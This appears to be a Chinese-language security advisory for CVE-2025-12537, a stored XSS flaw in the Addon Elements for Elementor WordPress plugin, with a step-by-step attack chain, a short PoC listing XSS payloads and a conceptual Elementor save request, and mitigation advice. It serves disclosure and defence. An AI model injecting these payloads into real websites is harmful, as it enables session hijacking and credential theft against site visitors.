CVE-2025-12537 WordPress Addon Elements for Elementor插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-12537

漏洞类型

存储型跨站脚本攻击 (Stored XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Addon Elements for Elementor (WordPress插件)

漏洞概述

CVE-2025-12537是WordPress插件Addon Elements for Elementor中的一个存储型跨站脚本(XSS)漏洞。该插件用于为Elementor页面构建器添加额外的元素组件。漏洞在1.14.3及之前所有版本中存在，原因是该插件对多个小部件参数缺乏充分的输入清理和输出转义处理。攻击者可以通过利用此漏洞在受影响的页面中注入任意JavaScript代码。由于是存储型XSS，恶意脚本会被永久保存在数据库中，任何访问包含恶意代码页面的用户都会执行该脚本，可能导致会话劫持、凭据窃取或恶意重定向等攻击。此漏洞需要认证才能利用，攻击者需要具备Contributor级别或更高的WordPress用户权限。

技术细节

该漏洞存在于Addon Elements for Elementor插件的多个小部件(widget)中。插件在处理用户输入时，未能对以下参数进行适当的HTML实体转义：文本内容、URL参数、CSS样式值等。当这些未经过滤的数据被输出到网页时，攻击者可以注入恶意脚本代码。具体来说，攻击者可以在小部件的参数中插入类似<script>alert(document.cookie)</script>或<img src=x onerror=alert(1)>的payload，这些代码会被存储在WordPress数据库中。当其他用户访问包含该小部件的页面时，浏览器会执行这些恶意脚本。由于Elementor是WordPress最流行的页面构建器之一，该插件被广泛使用，使得此漏洞的影响范围较大。攻击者可利用此漏洞窃取管理员会话令牌、修改页面内容或进行钓鱼攻击。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标网站使用WordPress和Addon Elements for Elementor插件（版本<=1.14.3）

STEP 2

Authentication

攻击者获取WordPress Contributor级别账户（可通过注册或社会工程学手段）

STEP 3

Payload Preparation

攻击者构造恶意XSS payload，如<script>alert(document.cookie)</script>或事件处理器属性

STEP 4

Exploitation

使用Elementor页面编辑器，在Addon Elements小部件的参数字段中注入XSS payload并保存页面

STEP 5

Persistence

恶意脚本被永久存储在WordPress数据库中，成为页面内容的一部分

STEP 6

Trigger

受害者访问包含恶意代码的页面，浏览器执行注入的JavaScript代码

STEP 7

Impact

攻击者实现会话劫持、凭据窃取、页面内容篡改或进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-12537 PoC - Stored XSS in Addon Elements for Elementor // Author: [email protected] // PoC payload for XSS injection // This payload can be inserted into widget parameters (e.g., text fields, URLs) var xssPayload = '<script>alert(document.cookie)</script>'; var imgPayload = '<img src=x onerror=alert(String.fromCharCode(88,83,83))>'; var svgPayload = '<svg/onload=alert(document.domain)>'; // Example: Attacker with Contributor access modifies a page via Elementor // Steps: // 1. Login as Contributor or higher role // 2. Edit any page with Elementor // 3. Add any Addon Elements widget (e.g., Info Box, Button, etc.) // 4. Insert XSS payload in vulnerable parameter fields // 5. Save and publish the page // 6. Any user visiting the page will execute the injected script // Example API request structure (conceptual) const exploitData = { action: 'elementor_ajax', commands: ['save_builder'], data: { elements: [{ id: 'unique-widget-id', widgetType: 'addon_elements_info_box', settings: { title: xssPayload, // Vulnerable field // other settings... } }] } }; console.log('XSS Payload:', xssPayload); console.log('Target: Addon Elements for Elementor <= 1.14.3');

影响范围

Addon Elements for Elementor < 1.14.4

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1) 限制用户注册功能，仅允许受信任用户注册；2) 使用WordPress安全插件（如Wordfence）监控异常用户活动；3) 对所有用户启用双因素认证；4) 定期审查所有页面内容，检查是否存在可疑脚本注入；5) 考虑暂时禁用Addon Elements插件，直到完成安全更新。